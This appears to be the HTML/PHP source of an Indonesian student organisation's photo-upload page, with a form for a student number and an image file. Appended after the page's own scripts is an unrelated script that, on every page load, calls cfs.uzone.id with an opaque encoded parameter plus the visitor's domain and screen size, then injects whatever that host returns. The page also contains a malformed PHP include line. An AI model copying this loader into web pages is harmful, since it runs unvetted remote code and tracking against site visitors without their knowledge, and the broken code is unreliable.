<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="OKE">
    <meta name="author" content="ShinDarth">

    <title>Unggah Foto PDL</title>

    <link rel="icon" href="/favicon.ico">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap-theme.min.css">
    <style>body { padding-top:50px; }.navbar-inverse .navbar-nav > li > a { color: #DBE4E1; }</style>

    <!--[if IE]>
      <script src="https://cdn.jsdelivr.net/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://cdn.jsdelivr.net/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>

  <body>
  <?php include $_SERVER['DOCUMENT_ROOT'] . "/analisis.php";
    <nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="#">Unggah Foto PDL buat BEM FIKTI UG</a>
        </div>

        <div class="collapse navbar-collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="#">Konfirmasi Unggah</a></li>
            
          </ul>
        </div><!--.nav-collapse -->
      </div>
    </nav>

    <div class="container">

      <div style="max-width: 650px; margin: auto;">
        <h1 class="page-header">Unggah Foto</h1>
        <p class="lead">Foto PDL belakang bewarna polos / bisa diedit di photoshop hehe</p>

        <form id="upload-image-form" action="" method="post" enctype="multipart/form-data">
		<div class="form-group">
			<h6>Silahkan masukkan NPM anda!</h6>
            <input type="text" name="npm" id="npm" class="form-control" required>
          </div>
          <div id="image-preview-div" style="display: none">
            <label for="exampleInputFile">Pilihan gambar:</label>
            <br>
            <img id="preview-img" src="noimage">
          </div>
		  
          <div class="form-group">
            <input type="file" name="file" id="file" required>
          </div>
          <button class="btn btn-lg btn-primary" id="upload-button" type="submit" >Upload gambar</button>
        </form>

        <br>
        <div class="alert alert-info" id="loading" style="display: none;" role="alert">
          Sedang mengupload..
          <div class="progress">
            <div class="progress-bar progress-bar-striped active" role="progressbar" aria-valuenow="45" aria-valuemin="0" aria-valuemax="100" style="width: 100%">
            </div>
          </div>
        </div>
        <div id="message"></div>
      </div>

      

    </div>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/js/bootstrap.min.js"></script>
    <script src="upload-image.js"></script>
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582HVlH3eBnL31lhKCa%2fIUpZX2xT23a5GdFpOGTm6bKBrq%2fLgnedcZcTyLWNtszPnSwpmOt1iHJ2%2fgrhKZxNQkRIVYZt9WF9g%2bq7%2f6OEe2xH%2fn4zzOAt%2bJxbTdXEwrvRrg6JF64yU3B%2f1Y6VDBf2STqmiHEpDzEgM6BCp0r8gXQ9U8ktxXk%2fRENFKSRfiiZ42d0qtTs%2f7Tperh96%2bf%2fH00nUArx8riLe6a%2fSMrMFOA5zaqfYq%2brk53m5in6aGbMMfJ4qe8O8EqEX3GeXdsOVoEalopQyUJtD7rzB2C5OEDAko74%2faWPhW2Beo1SKw7hFEyHtshNuuERTDLIwh9J%2fGkjtvwA1X5Nj1%2f8t%2fVVMEsiLlqIeR6ak6ZvcjOg14uA%2f9ySEaSct8RlO7eF9tOJVFq705tsW66xsIpjuED%2bmN71gmHwZDVIMxyLtZpp95GzWdpwzFLIVPIurn3KvzLr%2bb4dn5GxlOT6UTXp9rVpvF1c6lFnn0pP1oSLNnZhrqIZFISnEanumh8Pf%2b4GD%2bBFIk8uujg%2fUAe%2b%2bQpD%2fXkur7mVKR3ON47NIvMY4r1rq7cJN6jzUc5m5BMZyJ2" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
